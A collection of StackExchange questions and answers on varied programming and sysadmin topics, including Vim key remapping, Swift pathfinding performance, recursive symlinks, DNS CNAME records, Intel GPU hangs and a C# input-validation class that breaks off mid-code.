_vi.8298 | I am trying to use KBC Poker 3 keyboard which combines `,~ and <Esc> as one key with Vim and wondering if it is possible to use the quick press of the escape key as char '`', and long press of escape key (longer than 500ms) as escape key. Is it possible? | Use the same key for `, ~, esc | keyboard layout | As far as I know there is no built-in support for mappings that change based on the time you hold the key.But as the problematic key is Esc, you have some good alternatives:Use Ctrl+[, which works by default (as explained in :help key-codes):<Esc> escape CTRL-[ 27 *escape* *<Esc>*As Esc is a heavily used key in Vim, many people use mappings for it, such as jj, jk, or CapsLock:Reaching up to hit the escape key sucksDo you remap your Escape key?Learn Vimscript the Hard Way - chapter 10If you choose to remap the CapsLock (as I did myself), you may find the capslock plugin useful. |
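A concrete version of the remapping route suggested in the answer above, for ~/.vimrc:

" leave insert mode with a quick jk, keeping ` and Esc free for other uses
inoremap jk <Esc>

How quickly the two keys must be typed in sequence is governed by 'timeoutlen' (see :help timeoutlen).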
_codereview.72106 | I'm new to the Swift language. I have a C# version of a simple A* route which is very fast. But I rewrote it with Swift, and the performance is very bad (3,4 seconds for a very simple road).Could someone give me some suggestions? What I thought is that, the loop and compares logic spends most of the time.Here is the entire project.When the app launches, the screen is covered with many white blocks. You could touch on it to switch color to red, blue, yellow etc. Red means blocks; blue means start point; yellow means destination point. We could simply set a point to blue and a yellow from lower left corner to upper right corner; once the yellow color is set, I will execute the route logic; you will see how slow it is.import Foundationimport SpriteKitpublic class RouteManager { public init(column : Int, row : Int) { var matrix = [[Bool]]() for var r : Int = 0; r <= row; r++ { var oneRow = [Bool]() for var c : Int = 0; c <= column; c++ { oneRow.append(false) } matrix.append(oneRow) } self.matrix = matrix self.costCalc = SimpleCostCalc() } public required init (matrix : [[Bool]]) { self.matrix = matrix self.costCalc = SimpleCostCalc() } public var matrix : [[Bool]] public var costCalc : CostCalcProtocal!; public func route(start : PointInt, destination : PointInt) -> [PointInt]? { let map = RectInt(x: 0, y: 0, width: matrix[0].count, height: matrix.count) if(!map.contains(start) || !map.contains(destination)) { return nil } let routeData = RouteData(rect: map, destination: destination) let startNode = AStarNode(location: start, previousNode: nil, costG: 0, costH: 0) routeData.openedNodes.append(startNode) var currentNode = startNode return routeCore(routeData, currentNode: currentNode) } func routeCore (routeData : RouteData, currentNode : AStarNode) -> [PointInt]? { let start = NSDate() for direction in routeData.directions { let nextLocation = currentNode.location.getAdjecentPoint(direction) if !routeData.rect.contains(nextLocation) { continue } if matrix[nextLocation.y][nextLocation.x] { continue } let costG = costCalc.getCostG(currentNode, direction: direction) let costH = costCalc.getCostH(nextLocation, destination: routeData.destination) if costH == 0 { var result = [PointInt]() result.append(routeData.destination) result.insert(currentNode.location, atIndex: 0) var tempNode = currentNode while (tempNode.previousNode != nil) { result.insert(tempNode.previousNode!.location, atIndex: 0) tempNode = tempNode.previousNode! } return result } let existingNode = getNodeOnLocation(nextLocation, routeData: routeData) if((existingNode?) != nil) { if(existingNode!.costG > costG) { existingNode!.previousNode = currentNode existingNode!.costG = costG } } else { let newNode = AStarNode(location: nextLocation, previousNode: currentNode, costG: costG, costH: costH) routeData.openedNodes.append(newNode) } } let currentNodeIndex = indexOf(routeData.openedNodes, item: currentNode) routeData.openedNodes.removeAtIndex(currentNodeIndex) routeData.closedNodes.append(currentNode) println(routeData.openedNodes.count) let minimumCostNode = getMinimumCostNode(routeData) if minimumCostNode == nil { return nil } return routeCore(routeData, currentNode: minimumCostNode!) } func getMinimumCostNode(routeData : RouteData) -> AStarNode? { var node : AStarNode? = nil if(routeData.openedNodes.count != 0) { for n in routeData.openedNodes { if node == nil { node = n } else if node?.costF > n.costF { node = n } } } return node } func getNodeOnLocation (location:PointInt, routeData : RouteData) -> AStarNode? 
{ for node in routeData.openedNodes { if node.location.x == location.x && node.location.y == location.y { return node; } } for node in routeData.closedNodes { if node.location.x == location.x && node.location.y == location.y { return node } } return nil } func indexOf (items : [AStarNode], item : AStarNode) -> Int { var result = -1 for var index = 0; index < items.count; index++ { if items[index] === item { result = index break } } return result }} | Performance of A* route | beginner;performance;pathfinding;swift | Without a clue as to what is actually running slow and without enough code to actually compile and time profile myself, the first thing that stands out to me is your nested loop in init.Why don't we replace that nested loop with the following:self.matrix = [[Bool]](count: row, repeatedValue:[Bool](count: column, repeatedValue: false))We have a variable, costCalc, which is of type CostCalcProtocal! (it's spelled protocol by the way). But there are problems with this...First of all, all of our init messages initialize it to SimpleCostCalc(). Why don't we just put this at the variable declaration?public var costCalc: CostCalcProtocal! = SimpleCostCalc()And we are we abbreviating so much? I've never once heard autocomplete complain about helping me make my code more readable:public var costCalculator: CostCalculatorProtocol! = SimpleCostCalculator()Much better.But there's still problems here.The question is, do we want to allow the user to set the cost calculator? This looks a bit like a protocol-delegate pattern, so perhaps we do. If this is what we want, using the forced unwrapped optional is bad. It allows the user to set this variable to nil and crash when you try to access it. For example:let routeManager = RouteManager(column: 3, row: 4)routeManager.costCalc = nillet result = routeManager.routeCore(routeData: foo, currentNode: bar)This will crash.The explicitly unwrapped optional is saying this variable should never be nil... but the fact that it's an optional means it could be nil (and you can set it nil and nothing prevents that). And the fact that it's forced unwrapped instead of optionally unwrapped means you get a crash.So, if we want to let the user set it, we have two options:public var costCalculator: CostCalculatorProtocol = SimpleCostCalculator()public weak var costCalculator: CostCalculatorProtocol? = SimpleCostCalculator()The first option means non-optional. We will always have a valid costCalculator object.The second option means optional. It could possible be nil, but because it's optional with the question mark, that's okay--we'll be checking it for nil every step of the way.But there's also that word weak there. This may or may not be necessary.If we're following a typical protocol-delegate pattern, this is almost certainly necessary. In most cases, a delegate has a reference to the object it is delegating. If the delegate has a strong reference to the delegated object, and the delegated object has a strong reference back to the delegate, we've created what's called a retain-cycle. Neither object will ever be released by ARC--they'll be kept in memory forever.Making the variable a weak, optional means that if the cost calculator has no other strong references to it, our reference to it will be nil-ed out as it deallocates (and if it was the only strong reference to us, we'll deallocate as well, appropriately). |
_webapps.19840 | I've noticed that pages that I have marked with +1 show You +1'd this in Google search results. However, it doesn't seem to affect the order of results, or there may be very small differences I can't see or notice. How do I get pages marked +1 on top of other search results? I was thinking of using it like a read-it-later or similar service. Like when I mark web pages read it later, but never read them. If +1-marked pages appear on top of search results, it may be time to read them. | How do I get pages marked +1 in Google search results to rise to the top? | google search;google plus 1 | According to this WIRED article, Google is investigating whether to consider +1 as a signal in future updates of the search engine. Google confirmed its plans in an e-mail to Wired.com. Google will study the clicks on +1 buttons as a signal that influences the ranking and appearance of websites in search results, a spokesman wrote. The purpose of any ranking signal is to improve overall search quality. For +1s and other social ranking signals, as with any new ranking signal, we'll be starting carefully and learning how those signals are related to quality. So, for now at least, the pages you are +1-ing will not change ranking.
_unix.277162 | I am experiencing an issue with an indexing program running much longer than expected. I want to rule out the possibility of a recursive symbolic link. How could I find a symbolic link that is recursive at some level? | How could I quickly find a recursive symbolic link? | find;symlink;recursive | null
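One way to check for the recursive-link possibility is sketched below in Python, under the assumption that two cases matter: a link chain that cycles back on itself (stat fails with ELOOP) and a link that points at one of its own ancestor directories (which makes any follow-links traversal descend forever). This is an illustration, not a canned tool.

import os, errno

def find_recursive_symlinks(root):
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        here = os.path.realpath(dirpath)
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            try:
                os.stat(path)                        # follows the whole link chain
            except OSError as err:
                if err.errno == errno.ELOOP:         # "Too many levels of symbolic links"
                    hits.append((path, "symlink cycle"))
                continue
            target = os.path.realpath(path)
            if here == target or here.startswith(target + os.sep):
                hits.append((path, "points back to an ancestor directory"))
    return hits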
_softwareengineering.164886 | I have been programming for a couple of years and have often found myself at a dilemma. There are two solutions - one is the simple approach, easier to understand and maintain. It involves some redundancy, some extra work (extra IO, extra processing) and therefore is not the most optimal solution. The other uses a complex approach, difficult to implement, often involving interaction between a lot of modules, and is a performance-efficient solution. Which solution should I strive for when I do not have a hard performance SLA to meet and even the simple solution can meet the performance SLA? I have felt disdain among my fellow developers for the simple solution. Is it good practice to come up with the most optimal, complex solution if your performance SLA can be met by a simple solution? | Simple vs Complex (but performance efficient) solution - which one to choose and when? | design;programming practices;coding style;code quality;performance | Which solution should I strive for when I do not have hard performance SLA to meet and even the simple solution can meet the performance SLA? The simple one. It meets spec, it's easier to understand, it's easier to maintain, and it's probably a whole lot less buggy. What you are doing in advocating the performance efficient solution is introducing speculative generality and premature optimization into your code. Don't do it! Performance goes against the grain of just about every other software engineering 'ility' there is (reliability, maintainability, readability, testability, understandability, ...). Chase performance when testing indicates that there truly is a need to chase after performance. Do not chase performance when performance doesn't matter. Even if it does matter, you should only chase performance in those areas where the testing indicates that a performance bottleneck exists. Do not let performance problems be an excuse to replace simple_but_slow_method_to_do_X() with a faster version if that simple version doesn't show up as a bottleneck. Enhanced performance is almost inevitably encumbered with a host of code smell problems. You've mentioned several in the question: a complex approach, difficult to implement, higher coupling. Are those really worth dragging in?
_codereview.16451 | A question was asked over at math.SE (here) about whether or not there are infinitely many superpalindromes. I'm going to rephrase the definition to a more suitable one for coding purposes:Definition: A superpalindrome is a product of primes p(1) * p(2) * ... * p(k), where p(i)<=p(i+1) for 1<=i<=k-1, such that p(1) * p(2) * ... * p(r) is a palindrome for all 1 <= r <= k.A natural question to ask, is whether or not there's an infinite number of superpalindromes with all of its prime factors <=N. Thus, we can use a depth-first search.Here is my implementation in C using GMP, but I'm wondering if there is some ways to give non-trivial run-time improvements.#include <stdio.h>#include <gmp.h>// search for superpalindromes containing prime factors in {2,3,...,q}// where q is the MAX_NR_PRIMES-th prime#define MAX_NR_PRIMES 20000#define MAX_SEARCH_DEPTH 100#define MAX_NR_DIGITS 10000// start backtracking at the (STARTING_PRIME_ID+1)-th prime#define STARTING_PRIME_ID 0mpz_t list_of_small_primes[MAX_NR_PRIMES];mpz_t n_new[MAX_SEARCH_DEPTH];int max_depth_reached=0;mpz_t nr_superpalindromes_found[MAX_SEARCH_DEPTH];// checks if n is a palindrome// idea borrowed from http://gmplib.org/list-archives/gmp-discuss/2012-February/004876.htmlint is_palindrome(mpz_t n) { char m[MAX_NR_DIGITS]; int len=gmp_sprintf(m,%Zd,n); for(int i=0;i<len;i++) { if(m[i]!=m[len-i-1]) return 0; } return 1;}// depth-first search for superpalindromes// searches for a prime p:=list_of_small_primes[i_new], with i_new>=i// such that n*p is a palindrome; continues searching if one is foundint extend_superpalindrome_backtracking_algorithm(mpz_t n,int i,int depth) { for(int i_new=i;i_new<MAX_NR_PRIMES;i_new++) { // n_new[depth]:=n*p mpz_mul(n_new[depth],n,list_of_small_primes[i_new]); if(is_palindrome(n_new[depth])) { // increment count of number of superpalindromes with depth+1 prime factors mpz_add_ui(nr_superpalindromes_found[depth],nr_superpalindromes_found[depth],1); // print out the first superpalindrome found with >depth+1 prime factors if(depth>max_depth_reached) { max_depth_reached=depth; gmp_printf(superpalindrome found: %Zd at depth %d: ,n_new[depth],depth+1); mpz_t primes[MAX_SEARCH_DEPTH]; for(int i=0;i<MAX_SEARCH_DEPTH;i++) mpz_init(primes[i]); mpz_set(primes[0],n_new[0]); for(int i=1;i<=depth;i++) mpz_divexact(primes[i],n_new[i],n_new[i-1]); for(int i=0;i<=depth;i++) gmp_printf(%Zd ,primes[i]); printf(\n); for(int i=0;i<MAX_SEARCH_DEPTH;i++) mpz_clear(primes[i]); } // continue the depth-first search if superpalindrome found extend_superpalindrome_backtracking_algorithm(n_new[depth],i_new,depth+1); } }}int main() { mpz_t n,p; mpz_init_set_ui(n,1); mpz_init_set(p,list_of_small_primes[STARTING_PRIME_ID]); for(int i=0;i<MAX_SEARCH_DEPTH;i++) mpz_init(n_new[i]); for(int i=0;i<MAX_SEARCH_DEPTH;i++) mpz_init(nr_superpalindromes_found[i]); for(int i=0;i<MAX_NR_PRIMES;i++) mpz_init(list_of_small_primes[i]); // pre-compute small primes mpz_set_ui(list_of_small_primes[0],2); for(int i=1;i<MAX_NR_PRIMES;i++) mpz_nextprime(list_of_small_primes[i],list_of_small_primes[i-1]); extend_superpalindrome_backtracking_algorithm(n,STARTING_PRIME_ID,0); // output results gmp_printf(\nfound all superpalindromes with prime factors in {2,3,...,%Zd}\n,list_of_small_primes[MAX_NR_PRIMES-1]); mpz_t total_nr_superpalindromes; mpz_init_set_ui(total_nr_superpalindromes,0); for(int i=0;i<=max_depth_reached;i++) { mpz_add(total_nr_superpalindromes,total_nr_superpalindromes,nr_superpalindromes_found[i]); gmp_printf(nr superpalindromes 
with %d prime factors: %Zd\n,i+1,nr_superpalindromes_found[i]); } gmp_printf(total nr superpalindromes: %Zd\n,total_nr_superpalindromes); mpz_clear(total_nr_superpalindromes); for(int i=0;i<MAX_SEARCH_DEPTH;i++) mpz_clear(n_new[i]); for(int i=0;i<MAX_NR_PRIMES;i++) mpz_clear(list_of_small_primes[i]); mpz_clear(n); mpz_clear(p); return 0;}Here's the output:superpalindrome found: 4 at depth 2: 2 2 superpalindrome found: 8 at depth 3: 2 2 2 superpalindrome found: 88 at depth 4: 2 2 2 11 superpalindrome found: 2552 at depth 5: 2 2 2 11 29 superpalindrome found: 257752 at depth 6: 2 2 2 11 29 101 superpalindrome found: 67788776 at depth 7: 2 2 2 11 29 101 263 superpalindrome found: 616267762616 at depth 8: 2 2 2 11 29 101 263 9091 superpalindrome found: 6101667117661016 at depth 9: 2 2 2 11 29 101 263 9091 9901 superpalindrome found: 20302629368699686392620302 at depth 10: 2 11 11 11 101 9091 9091 9091 9901 10151 superpalindrome found: 1001004004006006004004001001 at depth 11: 7 11 13 101 101 101 101 9901 9901 9901 9901 found all superpalindromes with prime factors in {2,3,...,224737}nr superpalindromes with 1 prime factors: 113nr superpalindromes with 2 prime factors: 428nr superpalindromes with 3 prime factors: 1022nr superpalindromes with 4 prime factors: 1539nr superpalindromes with 5 prime factors: 1603nr superpalindromes with 6 prime factors: 1137nr superpalindromes with 7 prime factors: 565nr superpalindromes with 8 prime factors: 217nr superpalindromes with 9 prime factors: 50nr superpalindromes with 10 prime factors: 13nr superpalindromes with 11 prime factors: 1total nr superpalindromes: 6688Currently, I'm mostly concerned about the efficiency of is_palindrome(mpz_t n) since it feels like a two-pass method: (a) copy the number to a string, (b) check if the string is a palindrome. But please highlight any other areas I might not be concerned about but should be.Most of the numbers encountered by is_palindrome(mpz_t n) will not be palindromes, but my attempt at checking only the first and last digits was thwarted by mpz_sizeinbase not giving the exact number of digits in base 10 (and it added too much overhead to add a check if the number of digits is correct function). | Depth-first search method for searching for all superpalindromes whose prime factors are all <=N | optimization;c;primes;palindrome;depth first search | null |
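On the is_palindrome concern at the end of the question above: GMP's mpz_sizeinbase(n, 10) is documented to return either the exact digit count or one too many, so an exact count only needs one extra comparison against a power of ten; after that, the outermost digits can be compared arithmetically and most non-palindromes rejected after a digit or two. A sketch of that digit-by-digit idea, in Python rather than C/GMP so the arithmetic is easy to see:

def is_palindrome(n):
    if n < 0:
        return False
    digits = len(str(n))          # stand-in for an exact digit count
    hi = 10 ** (digits - 1)       # selects the most significant remaining digit
    lo = 1                        # selects the least significant remaining digit
    while hi > lo:
        if (n // hi) % 10 != (n // lo) % 10:
            return False          # first mismatch ends the check early
        hi //= 10
        lo *= 10
    return True

In the C version the same loop would use mpz_tdiv_q and mpz_fdiv_ui on precomputed powers of ten; whether that actually beats gmp_sprintf for numbers of this size is something to measure rather than assume.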
_unix.141192 | My system has problems with the DisplayPort connection. This is indicated by several problems that, at first glance, do not have anything in common. The reason I claim DP is the cause is that when I connect another monitor via DVI these problems just vanish. When I put the monitor to sleep it won't wake up. The journal contains: [drm:intel_dp_start_link_train] *ERROR* failed to enable link and sometimes [drm:i915_hangcheck_elapsed] *ERROR* Hangcheck timer elapsed... GPU hung. Qt applications need a few seconds to start, and meanwhile freeze X. Today I had a complete never-ending system freeze. As a follow-up, KDE start is painfully slow and accompanied by multiple freezes. I use an up-to-date Arch system on an i5-4590, using the Intel HD4600. Here is dmesg with the drm.debug=0xe command line. I cut about a million [drm:drm_dp_i2c_do_msg] native defer lines to make it cleaner. Intel drivers are installed. The config: # for i in /sys/module/i915/parameters/*; do echo $i=$(cat $i); done /sys/module/i915/parameters/disable_display=N /sys/module/i915/parameters/disable_power_well=1 /sys/module/i915/parameters/enable_cmd_parser=0 /sys/module/i915/parameters/enable_fbc=-1 /sys/module/i915/parameters/enable_hangcheck=Y /sys/module/i915/parameters/enable_ips=1 /sys/module/i915/parameters/enable_ppgtt=1 /sys/module/i915/parameters/enable_psr=0 /sys/module/i915/parameters/enable_rc6=-1 /sys/module/i915/parameters/fastboot=N /sys/module/i915/parameters/invert_brightness=0 /sys/module/i915/parameters/lvds_channel_mode=0 /sys/module/i915/parameters/lvds_downclock=0 /sys/module/i915/parameters/lvds_use_ssc=-1 /sys/module/i915/parameters/modeset=-1 /sys/module/i915/parameters/panel_ignore_lid=1 /sys/module/i915/parameters/powersave=1 /sys/module/i915/parameters/prefault_disable=N /sys/module/i915/parameters/preliminary_hw_support=0 /sys/module/i915/parameters/reset=Y /sys/module/i915/parameters/semaphores=-1 /sys/module/i915/parameters/vbt_sdvo_panel_type=-1 | DisplayPort and Intel HD cause GPU hangs | linux kernel;i915;displayport;drm | null
_softwareengineering.110371 | I have built a number of websites for friends, family, etc. and I have put them all on a single shared web hosting account. Now that they are built, I want to get out of the business of supporting them and paying for them (my friends are reimbursing me but I am paying the actual bill), so I was thinking of having them create their own hosting accounts and slowly migrating the sites over. It got me thinking: how does any freelancer do this? Do they force their clients to set up their own hosting up front and let the programmer log into the customer account during development? What if there is a bug in the future and they need to go back in? I was curious to see what model most people who build websites for others use, as it seems like a tricky situation. | How do freelancer web developers manage web hosting for customers? | freelancing;web hosting | null
_cs.41082 | In this problem, I have a set of activities which can happen. Each activity is associated with several values: Duration: the length of time the activity takes; Earliest time to start: the earliest time at which the activity can begin; Latest time to start: the latest time at which the activity can begin; Weight/Value: the value/benefit gained if the activity happens. I have a set of activities $A = \left\{ a_{1},a_{2},\dots,a_{n}\right\} $. I want to find a subset of activities $\alpha \subset A$ which maximises the total value, subject to the constraint that two activities cannot overlap in time (so the subset of activities should be such that we can schedule these activities without any overlap, and such that each activity starts within its earliest and latest start times). Activities must be performed contiguously, i.e. we can't just break an activity in two and do half of it now and half of it later. If activities all had a fixed starting time, this would be equivalent to the Maximum Weight Independent Set of Intervals problem, but in this case an activity does not have a fixed starting time and it can move around. If activities could be positioned anywhere, this would be equivalent to a knapsack problem. I will use this with a time span of one day and activities will usually last between 1 and 4 hours. I had one idea, which I write below, but thought maybe someone would have a better idea. Heuristics and approximations would be helpful as well. I need something that will run in less than a second with ~$1000$ activities. So far what I thought of doing is duplicating activities that can move around. So if I have an activity $a$ which can start between 14:00 and 16:00, I create three activities: at 14:00, at 15:00 and at 16:00. That way I don't need to worry anymore about activities moving around, and I have a Maximum Weight Independent Set of Intervals problem, which at least seems well researched. Also, Maximum Weight Independent Set problems are quite well researched. Thank you! | Activity scheduling with activities that can move around | optimization;combinatorics;scheduling | null
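Under the discretization the question proposes (fixed start-time copies of each activity), the core subproblem is standard weighted interval scheduling. Below is a hedged sketch of that DP in Python, with one caveat stated as an assumption: two non-overlapping copies of the same activity could both be selected by this DP, so the full problem still needs an at-most-one-copy-per-activity constraint on top of it.

from bisect import bisect_right

def max_weight_schedule(intervals):
    # intervals: (start, end, weight) triples with fixed starts; half-open [start, end)
    intervals = sorted(intervals, key=lambda iv: iv[1])
    ends = [iv[1] for iv in intervals]
    dp = [0] * (len(intervals) + 1)             # dp[i] = best weight using the first i intervals
    for i, (s, e, w) in enumerate(intervals, start=1):
        j = bisect_right(ends, s, 0, i - 1)     # latest interval finishing no later than s
        dp[i] = max(dp[i - 1], dp[j] + w)
    return dp[len(intervals)]

With hourly start times over a single day, the duplication yields at most a few dozen copies per activity, so ~1000 activities stay comfortably within a one-second budget for the DP itself.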
_webapps.82441 | I got an email from my colleague about our business itinerary containing a flight confirmation as a PDF attachment. It turns out Google can detect that it's a flight confirmation. When I search 'itinerary' in Google it shows something like this. My question is, is there a way to add this info to my Google Calendar? (I want the flight schedule to be shown in my Sunrise app on my iPhone) | How to easily add flight itinerary to Google Calendar from flight confirmation email in Gmail? | gmail;google calendar | To add any email event to your Google Calendar... Open the email, click on More in the menu bar, then Create event. Sometimes Gmail copies all the details you need into the event description. Depending upon how well Gmail reads the PDF file, you may have to copy / paste the details from the PDF to the Calendar event.
_unix.191467 | How do I show the main shell that I use in UNIX? Is this command right: ps -p$$? Or is there a different way? | How to show the main shell that you use in UNIX | shell;shell script | null
_webmaster.69646 | Question #1:One DNS Look-up service I use states: (BTW, moodle.org is not my website!)Your website www.moodle.org does not have CName Record which is good.Why is this good?Introduction to Question #2:The same Look-up service states the following for our Domain Name: Your website has a CName Record. Your DNS Servers do not return any A Records (IPv4 Addresses), which causes an extra DNS Lookup, which will slightly delay connections to your website.Note: You may well be thinking why are my comparing Moodle with our Domain Name? It's because both Moodle and OUR website uses CloudFlare. Granted, this isn't a fair comparison to make. So, I checked Netblock owner of my IP Address in Netcraft's Toolbar, and found a number of websites Hosted on the same Shared Hosting space. Alas, none seem to be using CloudFlare. Nevertheless, I did a DNS Loop-up of one of these, and got the following Response for CNAME:Your website has a CName Record. Your DNS Servers also return an A Record (IPv4 Address) for the CName Record, which is good as it does not require an extra DNS Lookup.Question #2:Given that the DNS Report for our Domain Name states the following, repeated from above: Your website has a CName Record. Your DNS Servers do not return any A Records (IPv4 Addresses), which causes an extra DNS Lookup, which will slightly delay connections to your website.... what change might I need to make to our DNS Record? Please note '1400 TTL'.OUR current DNS Record:mydomain.org.uk. 14400 IN A 1##.##.###.### localhost.mydomain.org.uk. 14400 IN A 127.0.0.1mail.mydomain.org.uk. 14400 IN CNAME mydomain.org.ukwww.mydomain.org.uk. 1400 IN CNAME www.mydomain.org.uk.cdn.cloudflare.netftp.mydomain.org.uk. 14400 IN A 1##.##.###.### cpanel.mydomain.org.uk. 14400 IN A 1##.##.###.### webdisk.mydomain.org.uk. 14400 IN A 1##.##.###.### whm.mydomain.org.uk. 14400 IN A 1##.##.###.###webmail.mydomain.org.uk. 14400 IN A 1##.##.###.### mydomain.org.uk. 14400 IN TXT v=spf1 +a +mx +ip4:1##.##.###.### ~all cloudflare-resolve-to.mydomain.org.uk. 1400 IN CNAME mydomain.org.uk | Good, or Bad? 'www A Record (IPv4)' - website has a CName Record. | dns;cname | A CNAME is basically an alias to another DNS record. A not uncommon setup is something like this:example.com A xxx.xxx.xxx.xxxwww.example.com CNAME example.comIf someone hits www.example.com and the DNS result isn't cached, resolution of a setup like this is very slightly slower, since two DNS lookups are required (one for www.example.com, , followed by a lookup for example.com). So that's probably why the tool you're using is referring to a lack of CNAME as 'good'.I'm not familiar with Cloudflare's product offerings, but in your case you may only be able to use a CNAME, so I really wouldn't worry about this. Moodle may have a different Cloudflare setup to you gives them a dedicated IP they can point their records to. |
_cstheory.38119 | First, I'm mostly experienced with Math, which I hope won't be too inconvenient.I saw Operational Calculus on Programming Spaces by Sajovic and Vuk, which seemed very interesting to me (for a short summary of the paper, the Wikipedia article on Automatic Differentiation may be helpful). I had a few questions about how they defined their memory space of the program. The relevant section is below:We will model computer programs as maps on a vector space. If we only focus on the real valued variables (of type float or double), the state of the virtual memory can be seen as a high dimensional vector. A set of all the possible states of the programs memory, can be modeled by a finite dimensional real vector space $\mathcal{V} \equiv \mathbb{R}^n$. We will call $\mathcal{V}$ the memory space of the program. The effect of a computer program on its memory space $\mathcal{V}$, can be described by a map $$P : \mathcal{V} \to \mathcal{V}$$ A programming space is a space of maps $\mathcal{V} \to \mathcal{V}$ that can be implemented as a program in specific programming language.I understand how $\mathcal{V}$ should be some finite object - I don't understand why this should specifically be a vector space.One analogy that may be useful for this is the following. $C(\mathbb{R})$ denotes the set of all continuous functions $f:\mathbb{R}\to\mathbb{R}$. While continuous functions themselves aren't linear, we can define addition of continuous functions and scalar multiplication of continuous functions in a linear way by defining:$$(f+g)(x) \stackrel{def}{=} f(x) + g(x)$$$$k\cdot f(x) \stackrel{def}{=} (kf(x))$$Something similar to this undoubtedly works for programs on $\mathcal{V}$ - for a given state $s$, define $p_1 + p_2$ evaluated on $s$ as $p_1(s) + p_2(s)$. While this (likely) leaves us with a Banach space, I'm unsure if it's the correct interpretation.This would give us that the sum of two programs $p_1,p_2$ applied to some state $s$ is just $p_1(s) + p_2(s)$.So, looking at a single component of $p_1(s) + p_2(s)$, we have that the action of $p_1 + p_2$, as a program, is just the sum of the individual actions of $p_1$ and $p_2$ on the initial state. This seems like an odd interpretation for me - for whatever reason it'd seem much more natural to have the way to combine programs to be function composition, but this would lead to problems like $+$ not being commutative, and scalar multiplication being harder to define.In this paper, what's the correct interpretation of addition here? The usual addition seems to lead to the correct mathematical construct, but I'm having a hard time understanding what the program sum is supposed to model in real life.Edit: This Reddit Post seems to have some commentary on it which may help others. | Justifying the state of virtual memory as a vector space | fl.formal languages;ne.neural evol | null |
_webmaster.77740 | What's more important for my website, from an SEO perspective? I first had a page load time of around 900ms and a Google rating of about 70. Using some plugins I managed to get the rating up to around 85 (GTMetrix page speed 90%, YSlow 90%), but the page load time also increased to around 2 seconds. I understood that to get higher in Google's ranking, you need to have a high rating. So from an SEO perspective, wanting to get high in the search results, should I revert it and go back to the 900ms/70 pagespeed rating, or should I keep it like this for the higher pagespeed rating? | Pagespeed rating vs server speed from a SEO perspective | seo;wordpress;pagerank;page speed | Page speed is a bit of a misnomer. People took the early days of Google using page speed as a factor and seemed to forget what happened immediately after its implementation. I will explain. When Google announced that page speed would be a factor, a reordering of the SERP results caused a lot of heartburn. What happened was that Google was ranking very fast sites far more than sites that were still fast. The SERPs became far too heavy with very fast sites even when these would boost less desirable sites within results. Almost immediately the complaints were loud and strong. Google re-examined its metrics and did a mea culpa within weeks. As it turned out, acceptable-speed sites were being shut out from the top 10 results. Foul! and Not fair! was the cry from many site owners, and they were right. If your site is within a normal response range or greater, there is no boost. However, if your site is below a normal rate, then there is a downgrade. Your site is measured overall; however, slower pages can have an effect short of the obvious reason - content size. There is a measure that makes larger pages loading slower more acceptable than smaller pages loading slower. It is all a matter of whether your site is within an acceptable range as determined by the measures of all the sites that Google has indexed. Your site is surely fast enough. Of course you want your site to perform the best it can for user experience (UX). However, as you surf around the net, think to yourself, how fast did this site load? Most are measured in double-digit seconds these days with all the images, JavaScript, references to other sites, and so on. Google does not just measure your page, but all of what the page must download. Ever tried going to the larger e-commerce sites lately? Sshheesh! Making your site as fast as possible and as lean as possible is a good thing and you should do just that. But Mother Superior Google is not slapping your wrist with a ruler if you get a B or even a C in class. If you get an F however, WATCH OUT!
_codereview.165201 | Verifying the user's input is almost always required, even in really simple apps such as console calculator. Due to the wide variety of scenarios where this is useful I decided to make a few classes that will make the process easier.I currently have 2 classes for validation, one for input that will require parsing and one for input that is already parsed to the specified type. They both inherit a common interface:public interface IInputValidator<T> { ValidationResult<T> Validate();}Where the ValidationResult class is implemented as follows:public class ValidationResult<T>{ public bool Success { get; } public T Value { get; } public ValidationResult(bool success, T value) { Success = success; Value = value; } public ValidationResult(bool success) : this(success, default(T)) { }}The InputValidatorUnparsed<TSource, TValue> class which deals with input that needs to be parsed before operated on:public class InputValidatorUnparsed<TSource, TValue> : IInputValidator<TValue>{ public delegate bool InputTryParse(TSource input, out TValue value); private readonly InputTryParse inputTryParse; private readonly Func<TSource> _getUnparsedValue; private Action _onFailedAction; private IEnumerable<TValue> _allowedItems = Enumerable.Empty<TValue>(); private IEqualityComparer<TValue> _comparer = EqualityComparer<TValue>.Default; public InputValidatorUnparsed(Func<TSource> getUnparsedValue, InputTryParse tryParse) { inputTryParse = tryParse ?? throw new ArgumentNullException(nameof(tryParse)); _getUnparsedValue = getUnparsedValue; } public InputValidatorUnparsed<TSource, TValue> WithFailedAction(Action onFailedAction) { _onFailedAction = onFailedAction; return this; } public InputValidatorUnparsed<TSource, TValue> WithAllowedItems(IEnumerable<TValue> allowedItems) { return WithAllowedItems(allowedItems, _comparer); } public InputValidatorUnparsed<TSource, TValue> WithAllowedItems(IEnumerable<TValue> allowedItems, IEqualityComparer<TValue> comparer) { _allowedItems = allowedItems ?? throw new ArgumentNullException(nameof(allowedItems)); _comparer = comparer ?? throw new ArgumentNullException(nameof(comparer)); return this; } public ValidationResult<TValue> Validate() { var parsingSuccess = inputTryParse.Invoke(_getUnparsedValue.Invoke(), out TValue value); if (parsingSuccess && IsAllowedItem(value)) { return new ValidationResult<TValue>(true, value); } _onFailedAction?.Invoke(); return new ValidationResult<TValue>(false, value); } private bool IsAllowedItem(TValue item) { return !_allowedItems.Any() || _allowedItems.Any(i => _comparer.Equals(i, item)); }}Example usage:var validator = new InputValidatorUnparsed<string, int>(Console.ReadLine, int.TryParse) .WithFailedAction(() => Console.WriteLine(Invalid input please try again.)) .WithAllowedItems(Enumerable.Range(1, 10));var result = validator.Validate();while (!result.Success){ result = validator.Validate();}Console.WriteLine($Correct input = {result.Value});The InputValidatorParsed<TValue> which deals with input that wont required parsing to be operated on:public class InputValidatorParsed<TValue> : IInputValidator<TValue>{ private readonly Predicate<TValue> validator; private readonly Func<TValue> getInputValue; private Action _onFailedAction; private IEnumerable<TValue> _allowedItems = Enumerable.Empty<TValue>(); private IEqualityComparer<TValue> _comparer = EqualityComparer<TValue>.Default; public InputValidatorParsed(Func<TValue> getValue, Predicate<TValue> validator) { getInputValue = getValue ?? 
